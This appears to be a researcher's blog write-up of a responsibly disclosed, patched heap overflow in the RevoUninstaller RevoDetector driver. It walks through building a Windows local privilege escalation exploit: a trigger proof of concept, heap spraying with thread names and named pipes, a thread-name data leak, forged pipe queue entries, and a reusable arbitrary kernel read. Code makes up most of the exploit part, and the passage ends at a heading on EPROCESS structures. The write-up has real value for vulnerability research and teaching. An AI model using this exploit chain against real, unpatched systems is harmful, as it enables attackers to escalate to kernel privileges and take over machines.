Exploit Github: https://github.com/Kalagious/RevoDetectorExploit/tree/master
Introduction
I found a vulnerability in the RevoUninstaller software that allows an attacker to elevate privileges using a heap overflow in one of its drivers. In this post I go through where the bug is and how I found it. I also walk through the lengthy and technical process that goes into exploiting a driver bug like this. The driver itself gets loaded when the RevoUninstaller “Helper” setting is enabled. As of writing this post, the vulnerability has been responsibly disclosed to the RevoUninstaller team and has been patched. This post aims to demonstrate how exploit development for modern heap-based overflows in Windows drivers can be done, as well as explain how I built my exploit POC for RevoUninstaller.
Overflow
The overflow itself occurs in a driver IOCTL handler that is meant to read the name of the next process being spawned. Once an IRP is received, the driver waits until the next process is spawned and then copies the Windows process name into the user-supplied IRP system buffer. This is where the overflow occurs. Because the length is never checked, if the user supplies an IRP buffer that is too small and then spawns a process with a long name, the copy writes past the end of the IRP buffer.
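For contrast, the missing check can be sketched in portable C++. This is only an illustration, not the driver's code or the vendor's patch: `checkedCopy` and `CopyResult` are hypothetical names, and in a real handler the capacity would come from the output buffer length recorded in the IRP's stack location.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Result of a copy attempt: whether it succeeded and how many bytes were written.
struct CopyResult {
    bool ok;
    std::size_t written;
};

// Copies `srcLen` bytes into `dst` only if they fit into `dstCapacity`.
// The vulnerable handler effectively skips this comparison.
CopyResult checkedCopy(std::uint8_t* dst, std::size_t dstCapacity,
                       const std::uint8_t* src, std::size_t srcLen) {
    assert(dst != nullptr && src != nullptr);
    if (srcLen > dstCapacity) {
        // A driver would fail the request here instead of copying.
        return {false, 0};
    }
    std::memcpy(dst, src, srcLen);
    return {true, srcLen};
}
```

With a 0x50 byte destination, a 0x100 byte name is rejected and the destination is left untouched, while a name of 0x50 bytes or fewer is copied in full.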
Before exploiting this overflow, it is important to note a few key characteristics of this specific bug. First, the size is easily controllable by the attacker, who supplies both the process name and the IRP buffer size. Second, the overflow occurs in a Windows process name, so the overflowing data is copied as a Unicode string. The copy therefore stops after two consecutive null bytes, which Windows treats as the null terminator of the Unicode string. This will later become a significant thorn in my side. Third, the IRP buffer is allocated in the Non-Paged pool. This is important to note for later when deciding which objects to target.
Vulnerable Driver Function (Unchecked Memcpy)
__int64 __fastcall IOCtl_Handler(__int64 a1, IRP *IRP)
{
dword_140003080 = 1;
KeClearEvent(&Object);
KeWaitForSingleObject(&Object, UserRequest, 0, 1u, 0);
// OVERFLOW OCCURS HERE! The memcpy length is not checked beforehand
// The user controls both the size of the data being copied and the destination buffer size
memcpy(IRP->AssociatedIrp.MasterIrp, processInformation, (unsigned int)processInformationSize);
IRP->IoStatus.Status = 0;
IRP->IoStatus.Information = (unsigned int)processInformationSize;
IofCompleteRequest(IRP, 0);
return 0;
}
Triggering the Overflow
Triggering this specific overflow is a two-step process. First, a usermode application must send an IRP to the driver to trigger the vulnerable handler. When the IRP is sent, a System Buffer is allocated within the Non-Paged Pool. The System Buffer is the size supplied by the process that sent the initial IRP. Once the driver receives the IRP, it will copy the next process name into the System Buffer using a CreateProcessNotifyRoutine. Since it is possible to control both the size of the System Buffer and the name of the next spawned process, it is super easy to trigger the overflow with any desired size. The following is a very basic proof of concept that simply triggers the overflow with dummy data.
#include <windows.h>
#include <thread>
void SendIOCTL()
{
HANDLE hDevice = CreateFileW(
L"\\\\.\\RevoDetector",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
// Usermode buffer must be big enough to contain the whole
// overflow response to prevent overflow in the exploit process
char* sendBuffer = new char[0x500];
DWORD bytesReturned = 0;
memset(sendBuffer, 0x41, 0x500);
// Tell the driver the buffer is smaller than it really is (0x50)
BOOL status = DeviceIoControl(
hDevice,
CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS),
sendBuffer,
0x50,
sendBuffer,
0x50,
&bytesReturned,
NULL
);
}
int main()
{
// Send the IRP on a different thread, otherwise it will hang until a process is spawned
std::thread IOCTLThread(SendIOCTL);
Sleep(750);
// Spawn a process called DummyProc.exe which instantly exits
BYTE* processNameBuffer = new BYTE[0x100];
wchar_t processName[] = L"./DummyProc.exe ";
memcpy(processNameBuffer, processName, sizeof(processName));
// Fill the rest of the buffer with 0x45 to easily see the overflow
memset(processNameBuffer + sizeof(processName), 0x45, 0x100 - sizeof(processName));
CreateProcessW(NULL, (wchar_t*)processNameBuffer, NULL, NULL, TRUE, 0, NULL, NULL, new STARTUPINFO, new PROCESS_INFORMATION);
IOCTLThread.join();
}
Running this code triggers a basic overflow with the following results. The 0x41s in the first image show the System Buffer that is allocated for the IRP in order to contain the next spawned process name. This memory dump was taken right after the IRP was sent, but before the process with a forged name was spawned.

Once the process with a forged name is spawned using CreateProcessW, the long name overflows the allocated System Buffer for the IRP. This is shown here where the 0x45s appended at the end of the process name overflow past the System Buffer and corrupt the adjacent object with the “Vad” tag.

Non-Paged vs Paged Pool
It is important to distinguish which pool your overflow bug occurs in before developing an exploit. Certain objects in Windows will only ever be allocated to the Non-Paged pool while others will only ever be allocated to the Paged pool. This is important to know when choosing the object you plan on targeting. In my case, the object that contains an overflow is an IRP System Buffer which is allocated in the Non-Paged pool. This means that any object I plan to corrupt using an overflow must also be allocated in the Non-Paged pool. Otherwise, there will be no possibility of the target object being located right after the overflow object.
Exploitation Strategy
There are a number of ways to weaponize an overflow in a driver, the most obvious and simple being to use it to crash the machine. However, if an attacker wants to leverage the full potential of this bug class, they need to gain some capabilities. The holy grail of these is the combination of arbitrary read and arbitrary write, which allows an attacker to read and write the content of any memory address within the system. Once these capabilities are achieved, the attacker can use them for a number of potential exploitation strategies. In this post I will show how to use them to steal the system token and achieve local privilege escalation, but it is also possible to achieve kernel level code execution with some extra work.
Non-Paged Pool Target Objects
To achieve read and write primitives, I need to target specific objects that I can leverage to achieve these capabilities. By strategically modifying the data of these objects with the overflow, I can leverage their normal functionality to read or write system memory. The following table shows the objects I targeted in my exploit as well as what capability they are targeted for. There are 2 additional important things to note. All of these objects have variable sizes that are easily controllable by the user. This is important later down the road when it comes to allocating them in specific locations. They also are all allocated on the Non-Paged Pool which is important because that is where the vulnerable overflow object is allocated as well.
| Object Name | Capabilities |
|---|---|
| Thread Names | Adjacent Read |
| Named Pipe Data Queue | Arbitrary Read |
| I/O Ring | Arbitrary Write |
Heap Spraying
When exploiting an overflow-based memory corruption, it is very important to be able to control what is being overflowed. With stack-based overflows, this step is largely irrelevant because the stack layout is usually very consistent. However, with heap overflows, there is a lot of randomization introduced. The heap itself has no guarantee of having the same layout between different program executions. Furthermore, Windows intentionally tries to randomize the location of objects within the heap to reduce the reliability of this exact type of attack. Therefore, I have to employ a strategy called heap spraying to help target the specific objects I intend to overflow.
To understand heap spraying on modern Windows systems, it is important to understand how the Low Fragmentation Heap (LFH) works. The LFH is a specific implementation of the heap that handles all allocations between 0x0 and 0x200 bytes in size. Allocation sizes are rounded up to the next 0x10 byte interval, and each interval has its own bucket within the LFH. This means that 0x50 byte allocations will be allocated within the same page as one another. However, 0x50 and 0x60 byte allocations will never occur on the same page. For this reason it is extremely important to be precise with the size of both the payload and the sprayed objects to ensure they end up near each other.
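The bucket rule can be written down as a few lines of arithmetic. This is a simplified model of the description above, not the allocator's real logic: it ignores pool headers and any other per-allocation overhead, and the helper names are made up for illustration.

```cpp
#include <cassert>
#include <cstddef>

// Simplified model: sizes are rounded up to the next 0x10 bytes,
// and every rounded size up to 0x200 is its own LFH bucket.
constexpr std::size_t kGranularity = 0x10;
constexpr std::size_t kLfhMax = 0x200;

// Bucket size an allocation request is rounded up to.
constexpr std::size_t bucketSize(std::size_t requested) {
    return (requested + kGranularity - 1) / kGranularity * kGranularity;
}

// True if the request falls in the size range this model assigns to the LFH.
constexpr bool servedByLfh(std::size_t requested) {
    return requested > 0 && bucketSize(requested) <= kLfhMax;
}

// Two requests can only become neighbours if they share a bucket.
constexpr bool sameBucket(std::size_t a, std::size_t b) {
    return servedByLfh(a) && servedByLfh(b) && bucketSize(a) == bucketSize(b);
}

static_assert(sameBucket(0x48, 0x50), "0x48 rounds up into the 0x50 bucket");
static_assert(!sameBucket(0x50, 0x60), "0x50 and 0x60 never share a bucket");
```

In practice this means the overflow buffer and the sprayed target objects must be sized so that `sameBucket` would hold for them once all overhead is accounted for.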
With this in mind, what is heap spraying and how does it help increase reliability? Heap spraying begins by allocating thousands of target objects. The idea is that all of the existing holes in the heap get filled with objects. From that point on, target objects are allocated one after another, filling up entire pages.

Now that a continuous block of sprayed objects exists, every 2nd or nth object can be strategically freed. This leaves perfectly sized holes of free heap space that match the size of my overflow object. Since all earlier holes of this size were filled by the spray, it is very likely that the overflow object will land in one of these created slots when it is allocated.


This technique increases the likelihood that the overflow object will directly precede the desired target object. However, it is still important to note that the modern Windows LFH adds extra unavoidable randomness to these allocations. The technique is still required to make the exploit somewhat consistent, but it cannot guarantee reliability.
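The spray, free, and reallocate sequence can be illustrated with a toy page of equally sized slots. This is a deliberately deterministic sketch: `ToyPage` and its first-fit policy are assumptions made for the example, whereas the real LFH picks slots with added randomness, which is exactly why the real exploit needs retries.

```cpp
#include <cassert>
#include <cstddef>
#include <vector>

enum class Slot { Free, Sprayed, Overflow };

// Toy page made of equally sized slots (one LFH bucket).
struct ToyPage {
    std::vector<Slot> slots;

    explicit ToyPage(std::size_t count) : slots(count, Slot::Free) {}

    // Spray: fill every free slot with a target object.
    void spray() {
        for (Slot& s : slots) {
            if (s == Slot::Free) s = Slot::Sprayed;
        }
    }

    // Free every `interval`-th slot, starting at `start`, to create holes.
    void punchHoles(std::size_t start, std::size_t interval) {
        assert(interval > 0);
        for (std::size_t i = start; i < slots.size(); i += interval) {
            slots[i] = Slot::Free;
        }
    }

    // Toy first-fit policy: place the overflow object in the first hole.
    // Returns the slot index, or slots.size() if the page is full.
    std::size_t allocateOverflowObject() {
        for (std::size_t i = 0; i < slots.size(); ++i) {
            if (slots[i] == Slot::Free) {
                slots[i] = Slot::Overflow;
                return i;
            }
        }
        return slots.size();
    }

    // True if the slot right after `index` holds a sprayed target object.
    bool nextIsSprayed(std::size_t index) const {
        return index + 1 < slots.size() && slots[index + 1] == Slot::Sprayed;
    }
};
```

For a 16-slot page that is sprayed and then has every fourth slot freed starting at index 2, the overflow object lands in slot 2 and slot 3 still holds a sprayed target, which is the layout the technique aims for.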
Named Pipe Message Queue Arbitrary Read
To achieve an arbitrary read primitive, I use Named Pipe Data Queue Entry (DQE) objects. These objects form a linked list and represent messages that are waiting to be read within a named pipe. Whenever a message is sent to a named pipe, a data queue entry is added to the end of the linked list. The DQEs are allocated in the Non-Paged pool, which is perfect for my purposes. The reason these are good overflow targets is their ability to read directly from a pointer. Most DQEs are buffered, meaning the data is stored as a buffer within the DQE itself. However, if the unbuffered type is set, the DQE will follow a pointer to an IRP system buffer when attempting to fulfill a read request. The data is then sourced from the system buffer associated with the IRP.
Buffered DQE Layout

Unbuffered DQE Layout

struct NP_DATA_QUEUE_ENTRY {
LIST_ENTRY NextEntry;
IRP* Irp; // Overflow Target
UINT64 SecurityContext;
ULONG EntryType; // Overflow Target
ULONG QuotaInEntry;
ULONG DataSize;
ULONG Reserved;
char Data;
};
The unbuffered DQE provides a prime target for an overflow. If I can corrupt the DQE struct and overwrite the IRP pointer, it can be directed to a fake IRP structure I allocate in user mode. The forged IRP then points its “System Buffer” at an arbitrary address. When the named pipe goes to read a message from the Data Queue, it follows the corrupted pointer to my forged IRP and uses it to find where to read data from, which ends up being whatever memory address I point the SystemBuffer pointer at. Because the forged IRP is in user mode, I can swap the system buffer as often as I want and have a reusable arbitrary read.
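The difference between the two entry types, and why a swappable system buffer pointer yields a reusable read, can be modelled in user mode. The structures below are heavily simplified stand-ins (`ToyIrp`, `ToyDqe`, and `peekEntry` are hypothetical, and the enum values are chosen only for illustration); they are not the real kernel layouts.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

enum class EntryType : std::uint32_t { Buffered, Unbuffered };

// Stand-in for an IRP: only the field that matters for the read.
struct ToyIrp {
    const std::uint8_t* systemBuffer;
};

// Stand-in for a data queue entry.
struct ToyDqe {
    ToyIrp* irp;                  // followed only for unbuffered entries
    EntryType type;
    std::uint32_t dataSize;
    std::uint8_t inlineData[16];  // used only for buffered entries
};

// Mimics how a peek picks its data source based on the entry type.
std::size_t peekEntry(const ToyDqe& entry, std::uint8_t* out, std::size_t outLen) {
    const std::uint8_t* source = nullptr;
    if (entry.type == EntryType::Unbuffered) {
        assert(entry.irp != nullptr);
        source = entry.irp->systemBuffer;   // attacker-influenced pointer
    } else {
        assert(entry.dataSize <= sizeof entry.inlineData);
        source = entry.inlineData;
    }
    std::size_t n = entry.dataSize < outLen ? entry.dataSize : outLen;
    std::memcpy(out, source, n);
    return n;
}
```

Peeking the same unbuffered entry twice, with `systemBuffer` repointed in between, returns two different memory regions without touching the entry itself.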
DQE Overflow Layout

Null Terminator Overflow Limitation
As I mentioned previously, the overflow occurs in a Unicode string that is copied into a buffer. This means that if there are two or more consecutive null bytes in the overflow data, they will be interpreted as a string terminator and the copy will stop. I therefore have to ensure the data I intend to write with the overflow never contains two consecutive null bytes, which limits the amount of data I can effectively modify.
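A small checker makes the constraint concrete. It is a sketch under two assumptions that are mine rather than the driver's documented behaviour: the terminator is treated as a zero 16-bit character at an even offset from the start of the string, and any pointer in the payload is 2-byte aligned. Both function names are hypothetical.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Number of payload bytes a wide-string copy would transfer before it
// hits a 16-bit null character (assumed to sit at an even offset).
std::size_t bytesCopiedBeforeTerminator(const std::uint8_t* payload, std::size_t len) {
    assert(payload != nullptr);
    for (std::size_t i = 0; i + 1 < len; i += 2) {
        if (payload[i] == 0 && payload[i + 1] == 0) {
            return i;
        }
    }
    return len;
}

// True if none of the four 16-bit words of a 64-bit value is zero,
// i.e. the value could be carried through such a copy intact.
bool pointerSurvivesCopy(std::uint64_t value) {
    for (int shift = 0; shift < 64; shift += 16) {
        if (((value >> shift) & 0xFFFF) == 0) {
            return false;
        }
    }
    return true;
}
```

Under this model a value such as 0xFFFF800123456789 passes, while 0x00007FF612345678 fails because of its zero top word. A kernel address like 0xFFFFA00000001234 also fails, so even kernel pointers are only usable when none of their 16-bit words happens to be zero.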
One crucial limitation is that user mode addresses always start with two null bytes, meaning I cannot write user mode addresses with my overflow. Fortunately, kernel addresses start with 0xFFFF instead of null bytes, meaning I can overflow a pointer to point at a different kernel address. I can use a normal data queue to host my forged data in the kernel by sending a message containing the forged data to a named pipe. The only issue with this is that the IRP pointer could no longer be changed, making the read a one-time use.
To solve this, I create a fake DQE that is sent to a named pipe. This creates a real DQE where the content is a forged DQE. The forged DQE can be structured however I would like since it is simply being sent as a message. So I use it to point back to the forged user mode IRP.
Finally, I overflow the Flink of a real DQE so that it points to my forged one. Now the named pipe thinks the forged DQE is the next entry in the linked list and will attempt to read data from it if requested. This technique allows me to bypass the null terminator limitation, because the only value I have to write is the kernel address of the forged DQE.
Another benefit to this technique is that I no longer have to overflow the Entry Type flag which is significantly further down within the DQE structure. Now the only field being overflowed is the Flink which is the very top field in a DQE.

There is one final obstacle standing in the way of making this technique work. I do not have the address of the forged DQE within the kernel address space, and I cannot overwrite a real DQE's Flink with that address if I do not know where it is. To solve this, I take advantage of the linked list nature of the DQEs.
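The idea can be shown with a toy doubly linked list: once the link pointers of one entry are known, the address of its neighbour, and of the message bytes stored inside that neighbour, follows by simple arithmetic. `ToyListEntry`, `ToyQueueEntry`, and the helpers are illustrative stand-ins, and the data offset here comes from the toy struct rather than from the real DQE layout.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

struct ToyListEntry {
    ToyListEntry* flink;
    ToyListEntry* blink;
};

struct ToyQueueEntry {
    ToyListEntry link;      // first field, like NextEntry in a DQE
    std::uint8_t data[32];  // message bytes stored inside the entry
};

// Appends `entry` at the tail of a circular list headed by `head`.
void insertTail(ToyListEntry& head, ToyQueueEntry& entry) {
    entry.link.flink = &head;
    entry.link.blink = head.blink;
    head.blink->flink = &entry.link;
    head.blink = &entry.link;
}

// Given a leaked link pointer to another entry, computes where that
// entry's message bytes live.
std::uintptr_t payloadAddressFromLink(const ToyListEntry* leakedLink) {
    return reinterpret_cast<std::uintptr_t>(leakedLink) + offsetof(ToyQueueEntry, data);
}
```

With two entries queued on one list, reading the first entry's `flink` is enough to compute the address of the second entry's `data`, which is the role the forged message plays later on.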
Thread Name Data Leaks
Because the DQEs are organized in a linked list, I can find the location of one DQE if I can read the pointer to it within another DQE. Fortunately, there is another object I can use to leak data on the heap. Thread Name (TN) objects are a very simple Unicode data structure that can be attached to threads from user mode. These objects simply hold a Unicode string and the size of that string. If the size value within the object is modified to be larger than the real size, the kernel will read past the end of the string when returning the thread name data. This data can be easily requested from user mode. Using the aforementioned heap spraying technique, I allocate thousands of TN objects. The following is my implementation of heap spraying for the thread names.
void ThreadNameManager::CreateThreads(UINT64 iThreadCount)
{
// Create n threads with garbage data
WCHAR* payload = new WCHAR[nameSize];
wmemset(payload, L'A', nameSize / sizeof(WCHAR));
THREAD_NAME_INFORMATION threadName = { 0 };
threadName.ThreadName.Buffer = payload;
threadName.ThreadName.Length = nameSize;
threadName.ThreadName.MaximumLength = nameSize;
threadCount = iThreadCount;
threads = new HANDLE[iThreadCount];
for (int i = 0; i < iThreadCount; i++) {
threads[i] = CreateThread(NULL, 0, DummyThread, NULL, STACK_SIZE_PARAM_IS_A_RESERVATION, NULL);
// Add a name attribute to each created thread
_NtSetInformationThread(threads[i], ThreadNameInformation, &threadName, sizeof(threadName));
}
}
void ThreadNameManager::FreeSlots(UINT64 iStartCount, UINT64 iInterval)
{
// Free every nth thread slot to create holes in the pool
THREAD_NAME_INFORMATION emptyThreadName = { 0 };
for (int i = iStartCount; i < threadCount; i += iInterval) {
_NtSetInformationThread(threads[i], ThreadNameInformation, &emptyThreadName, sizeof(emptyThreadName));
}
}
int main()
{
nameManager.CreateThreads(5000);
nameManager.FreeSlots(1000, 9);
}
With the thread names sprayed, I then use my overflow to attempt to corrupt the size of a thread name to be twice the size of the current chunk. I then read all sprayed TNs to see if one returns more data than it should. If one does, it has been modified by the overflow. The following includes the logic I use to check for a corrupted TN as well as the whole overflow and scanning loop used to create a corrupted TN.
HANDLE ThreadNameManager::ScanForCorruptName()
{
ULONG returnLength = 0;
// The buffer must be at least as large as the length passed to the query below
BYTE* buffer = new BYTE[nameSize * 4];
// For every thread name, check if one returns more data than it should
for (int i = 0; i < threadCount; i++)
{
NTSTATUS status = _NtQueryInformationThread(threads[i], ThreadNameInformation, buffer, nameSize * 4, &returnLength);
if (status >= 0 && returnLength > nameSize + 0x10) {
printf(" [*] ###### Found ThreadName Overwrite ######\n");
leakThread = threads[i];
return threads[i];
}
}
return NULL;
}
int main()
{
printf("\n [*] ###### Corrupting ThreadName to Leak Data (VOLATILE) ######\n");
printf(" [!!!] ###### BSOD RISK ######\n");
// Create properly formatted overflow data
ThreadNameOverflow tnOverflow;
tnOverflow.threadName.Length = CHUNK_SIZE * 2;
ThreadNameManager nameManager(CHUNK_SIZE);
// Continue until corrupted name found
while (nameManager.leakThread == NULL)
{
// Create Heap Spray layout
nameManager.CreateThreads(3000);
nameManager.FreeSlots(1000, 6);
// Trigger the overflow with the payload size
HeapOverflow(hDevice, CHUNK_SIZE, (BYTE*)&tnOverflow, sizeof(tnOverflow));
// Check if the overflow hit any of the threadnames
if (!nameManager.ScanForCorruptName())
printf(" [+] Retrying Pool Layout\n");
}
// Clean up the rest of the threads no longer needed
nameManager.CleanExtraThreads();
}
This step is one of the two spots where this exploit can cause the computer to blue screen. Unfortunately this is unavoidable due to the randomness of the modern Windows LFH. Because the overflow is blind, occasionally an object that is not a TN will be overflowed. This has a high likelihood of causing the kernel to crash when it tries to use the corrupted object. But if everything goes correctly, I now have the ability to read any data on the heap that follows the TN object. Now all I need to do is spray a number of DQEs that contain my forged DQE data within them. It is important to have at least two DQEs per named pipe. This ensures that the linked list is formed and each DQE holds a pointer to the location of another DQE within the kernel.
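The adjacent read gained from a corrupted thread name length can be modelled with a flat byte array. This is a toy layout I made up for illustration (a 2-byte length field directly followed by the name bytes and then a neighbouring object); the real pool chunks carry headers and the real name structure is laid out differently.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr std::size_t kLengthFieldSize = sizeof(std::uint16_t);

// Toy pool layout: [2-byte length][name bytes][neighbouring object bytes].
std::vector<std::uint8_t> buildPool(const std::vector<std::uint8_t>& name,
                                    const std::vector<std::uint8_t>& neighbour) {
    std::vector<std::uint8_t> pool(kLengthFieldSize + name.size() + neighbour.size());
    std::uint16_t length = static_cast<std::uint16_t>(name.size());
    std::memcpy(pool.data(), &length, kLengthFieldSize);
    if (!name.empty())
        std::memcpy(pool.data() + kLengthFieldSize, name.data(), name.size());
    if (!neighbour.empty())
        std::memcpy(pool.data() + kLengthFieldSize + name.size(), neighbour.data(), neighbour.size());
    return pool;
}

// Simulates the overflow rewriting only the stored length.
void corruptLength(std::vector<std::uint8_t>& pool, std::uint16_t newLength) {
    assert(pool.size() >= kLengthFieldSize);
    std::memcpy(pool.data(), &newLength, kLengthFieldSize);
}

// The query trusts the stored length and returns that many bytes.
std::vector<std::uint8_t> queryName(const std::vector<std::uint8_t>& pool) {
    assert(pool.size() >= kLengthFieldSize);
    std::uint16_t length = 0;
    std::memcpy(&length, pool.data(), kLengthFieldSize);
    std::size_t available = pool.size() - kLengthFieldSize;
    std::size_t n = length < available ? length : available;  // keeps the toy memory-safe
    const std::uint8_t* start = pool.data() + kLengthFieldSize;
    return std::vector<std::uint8_t>(start, start + n);
}
```

Before the corruption `queryName` returns only the name. After the length is raised, the same query also returns the bytes of the neighbouring object, which is where a sprayed DQE is hoped to sit.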


Thousands of DQEs are allocated with the forged DQE data within them, but I only need the address of one to continue. Allocating thousands of them increases the odds that one will land right behind the corrupted TN object. If one doesn’t, I can free all of the DQEs and keep retrying until one eventually does land there for me to leak. The leaked DQE gives me the address of the next DQE in the list, which also contains my forged data. With this address, I simply need to add an offset to get the kernel address of the data section containing my forged DQE. The following code shows how I leak data from the heap adjacent to my corrupted TN and find a DQE in the leaked data.
BYTE* ThreadNameManager::LeakData()
{
BYTE* data = new BYTE[nameSize * 10];
BYTE* output = new BYTE[nameSize * 10];
memset(output, 0x0, nameSize * 3);
ULONG returnLength = 0;
NTSTATUS status = _NtQueryInformationThread(leakThread, ThreadNameInformation, data, nameSize * 4, &returnLength);
printf(" [*] Leaked %d bytes\n", returnLength);
memcpy(output, data + nameSize + 0x18, returnLength - nameSize);
return output;
}
POOL_PIPE_MESSAGE* ThreadNameManager::LeakPipeMessage(PipeManager* pipeManager)
{
// Every DQE has this pool tag, with it I can verify a DQE is in the leaked data
UINT32 targetHeader = 0x7246704e;
POOL_PIPE_MESSAGE* pipeMessage = NULL;
BYTE* leakedBytes = LeakData();
UINT64 leakSize = nameSize * 2;
UINT64 foundOffset = -1;
// Scan all leaked data for the pool tag
for (int i = 0; i <= leakSize - sizeof(UINT32); i++)
{
UINT32 currentDword = *(UINT32*)(leakedBytes + i);
if (currentDword == targetHeader)
{
foundOffset = i;
break;
}
}
// If the DQE is found, return only the data that is relevant for the DQE
if (foundOffset != -1)
{
printf(" [*] SUCCESS: Found target pool tag 0x%X at offset: 0x%llX\n", targetHeader, foundOffset);
UINT64 startAddr = (foundOffset >= 16) ? (foundOffset - 16) : 0;
startAddr &= ~7;
pipeMessage = (POOL_PIPE_MESSAGE*)(leakedBytes + startAddr);
printf("\n Leaked Pipe Message\n");
HexDumpLittleEndian(pipeMessage, 0x50);
}
else
printf(" [!] Pool tag not found\n");
return pipeMessage;
}
int main()
{
printf("\n [*] ###### Leak Forged Pipe Location ######\n");
ExploitManager exploitManager;
PipeManager pipeManager(CHUNK_SIZE, 1);
// Make a fake IRP for the forged DQE to point to
exploitManager.CreateFakeIRP();
// Create forged DQE data
POOL_PIPE_MESSAGE* fakePipeHeader = exploitManager.CreateFakeDataQueue();
// Allocate 5000 pipes with the forged DQES in their messages
pipeManager.CreatePipes(5000, fakePipeHeader);
// Check if any pipe is leaked by the TN
POOL_PIPE_MESSAGE* leakedPipe = nameManager.LeakPipeMessage(&pipeManager);
UINT64 targetMessageAddr = NULL;
UINT64 dataQueueAddr = NULL;
// Check if the leaked pipe is the first or second in the chain using marker bytes I added to each message
// Pull out the respective address based on its position in the linked list
if (leakedPipe->dataQueue.Data == 0x39)
{
printf(" [*] Leaked Pipe 1st Pipe in Chain\n");
targetMessageAddr = (UINT64)leakedPipe->dataQueue.NextEntry.Flink;
dataQueueAddr = (UINT64)leakedPipe->dataQueue.NextEntry.Blink;
}
else if (leakedPipe->dataQueue.Data == 0x40)
{
printf(" [*] Leaked Pipe 2nd Pipe in Chain\n");
targetMessageAddr = (UINT64)leakedPipe->dataQueue.NextEntry.Blink;
dataQueueAddr = (UINT64)leakedPipe->dataQueue.NextEntry.Flink;
}
else
{
printf(" [*] Leaked Pipe is Invalid\n");
}
// Offset into the DQE to get the location of the forged message
UINT64 forgedMessageAddr = targetMessageAddr + 0x50;
}
With the address of my forged DQE, I overflow the Flink pointer of a valid DQE using the same heap spraying technique. This step is the second potential location for a blue screen. Yet again I have to blindly overflow data and hope my heap spraying lined everything up correctly. There is always a chance that things are misaligned, resulting in a crash.
Fortunately, this is the last part I need to do blind, as the whole structure is now set up to enable my read primitive. I can simply change the pointer in my forged user mode IRP and call PeekNamedPipe on the pipe with the corrupted linked list. Because I sprayed thousands of named pipes, I first have to find the corrupted one, which I do by initially pointing the forged IRP at a user mode address I control. There, I can put known data like a char array full of ‘A’s. Then I attempt to peek all of the sprayed pipes, and the one that contains a continuous block of ‘A’s in the output is the corrupted one. From there the rest of the pipes are no longer needed.
// Scan all pipes for one containing extra data proving we corrupted it
HANDLE PipeManager::FindCorruptedPipe()
{
UINT32 expectedSize = pipeSize * 3-0x50;
BYTE* buffer = new BYTE[expectedSize * 20];
memset(buffer, 0x0, expectedSize * 20);
printf(" [*] Scanning %llu pipes for overwrite\n", pipeCount);
for (UINT64 i = 1; i < pipeCount; i++)
{
if (sPipes[i] != NULL && sPipes[i] != INVALID_HANDLE_VALUE)
{
DWORD bytesAvailable = 0;
BOOL status = PeekNamedPipe(sPipes[i], buffer, expectedSize, NULL, &bytesAvailable, NULL);
if (status)
{
for (UINT64 byteIndex = 0; byteIndex < expectedSize - 4; byteIndex += 4)
{
// Check if forged data was returned
if (*(UINT32*)(&buffer[byteIndex]) == 0x69696969)
{
printf("\n [*] SUCCESS: Corrupted pipe found at index %llu!\n", i);
corruptOffset = byteIndex;
delete[] buffer;
corruptedPipe = sPipes[i];
return corruptedPipe;
}
}
}
}
}
delete[] buffer;
return NULL;
}
int main()
{
printf("\n [*] ###### Corrupting PipeMessage Queue (VOLATILE) ######\n");
printf(" [!!!] ###### BSOD RISK ######\n");
// Create an overflow payload to overwrite the Flink pointer of the leaked DQE to point to my forged message
PipeMessageOverflow pmOverflow;
pmOverflow.pipeMessage.NextEntry.Flink = (_LIST_ENTRY*)forgedMessageAddr;
pmOverflow.pipeMessage.NextEntry.Blink = 0x0000;
HANDLE corruptedPipe = NULL;
PipeManager arbRePipes(CHUNK_SIZE, 2);
exploitManager.SetPipeManager(&arbRePipes);
UINT64 pipeCorruptionAttempts = 0;
while(true)
{
// Heap Spray pipes with messages
arbRePipes.CreatePipes(3000, NULL);
arbRePipes.CreateSlots(5000, 9);
// Trigger the overflow to corrupt the Flink pointer of the leaked DQE to point to the forged message
HeapOverflow(hDevice, CHUNK_SIZE, (BYTE*)&pmOverflow, sizeof(PipeMessageOverflow));
// Check if the overflow worked by scanning for a pipe that returns data from the forged message
corruptedPipe = arbRePipes.FindCorruptedPipe();
if (corruptedPipe)
break;
if (pipeCorruptionAttempts > 2)
{
printf(" [!] Failed to Corrupt PipeMessage After 3 Attempts, Likelihood of BSOD is HIGH! Exiting\n");
return 0;
}
pipeCorruptionAttempts++;
arbRePipes.ClearPipes();
}
}
It is important to use PeekNamedPipe when doing these operations. If the traditional ReadFile function is called on a named pipe, it reads the data and attempts to clear the queued messages. This is a nightmare for me because it would attempt to delete my forged message, making the read a one-shot. It would also attempt to walk and free the corrupted linked list, resulting in a crash. Fortunately, Windows offers an alternative function called PeekNamedPipe. It reads the message queue of the pipe all the same, but it does not attempt to clear it afterwards. This means I can swap the pointer in the forged IRP as many times as I want and reread the corrupted message. Here is the code from my exploit that implements this logic.
void ExploitManager::Read(UINT64* iDestinationAddr, UINT64 iTargetAddr, UINT64 iSize)
{
// Swap out the address on the forged IRP
fakeIRP->SystemBuffer = (BYTE*)iTargetAddr;
// Make sure to read more data than the pipe contains so the whole queue is walked
UINT32 expectedSize = pipeManager->pipeSize * 3;
// Make a buffer big enough to contain the result
BYTE* buffer = new BYTE[expectedSize * 10];
memset(buffer, 0x0, expectedSize * 10);
DWORD bytesAvailable = 0;
// Read the messages
BOOL status = PeekNamedPipe(pipeManager->corruptedPipe, buffer, expectedSize, NULL, &bytesAvailable, NULL);
if (status)
{
// Based on where the corrupted message was in the linked list, the result data will be at a different point in the output
memcpy(iDestinationAddr, buffer + pipeManager->corruptOffset, iSize);
delete[] buffer;
return;
}
// Release the scratch buffer on the failure path as well
delete[] buffer;
printf(" [!] Read at %p Failed!\n", (void*)iTargetAddr);
}
With this whole chain complete, I have achieved the aforementioned layout of forged named pipes and now have a reusable arbitrary read. From this point on I aim to develop an arbitrary write primitive. Before starting on that, there are a few other things I want to do in order to make getting the arbitrary write easier.
Finding the EPROCESS and Handle Table Structures
